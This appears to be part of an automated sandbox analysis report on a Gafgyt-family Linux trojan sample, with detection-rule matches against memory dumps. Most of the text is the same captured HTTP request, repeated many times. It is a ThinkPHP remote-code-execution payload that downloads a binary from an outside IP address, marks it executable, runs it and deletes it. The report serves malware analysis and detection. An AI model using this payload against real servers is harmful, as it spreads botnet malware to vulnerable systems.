          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0

          System Summary

          barindex
          Source: mods.arm7.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: mods.arm7.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: 6219.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6219.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: 6210.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6210.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: 6224.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6224.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: 6208.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6208.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: 6225.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6225.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: 6206.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6206.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: 6209.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6209.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: 6213.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6213.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: 6217.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
